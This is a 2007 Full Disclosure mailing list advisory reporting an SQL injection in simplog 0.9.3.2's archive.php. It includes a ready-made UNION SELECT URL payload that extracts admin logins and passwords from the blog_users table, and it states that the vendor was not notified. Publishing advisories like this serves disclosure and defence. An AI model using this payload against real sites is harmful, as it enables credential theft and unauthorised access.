Full Disclosure mailing list archives
simplog 0.9.3.2 SQL injection
From: Javor Ninov <drfrancky () securax org>
Date: Tue, 02 Jan 2007 00:31:49 +0200
Afected Software: simplog up to 0.9.3.2 (latest version - 12/05/2006 ) Site: http://www.simplog.org Simplog provides an easy way for users to add blogging capabilities to their existing websites. Simplog is written in PHP and compatible with multiple databases. Simplog also features an RSS/Atom aggregator/reader. Powerful, yet simple Vulnerability: SQL Injection in archive.php other files probably also affected Example: http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1 Vendor status: NOT NOTIFIED Javor Ninov aka DrFrancky drfrancky shift+2 securax.org http://securitydot.net/
Attachment:
signature.asc
Description: OpenPGP digital signature
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- simplog 0.9.3.2 SQL injection Javor Ninov (Jan 01)
- Re: simplog 0.9.3.2 SQL injection str0ke (Jan 01)
- Re: simplog 0.9.3.2 SQL injection Javor Ninov (Jan 02)
- Re: simplog 0.9.3.2 SQL injection str0ke (Jan 01)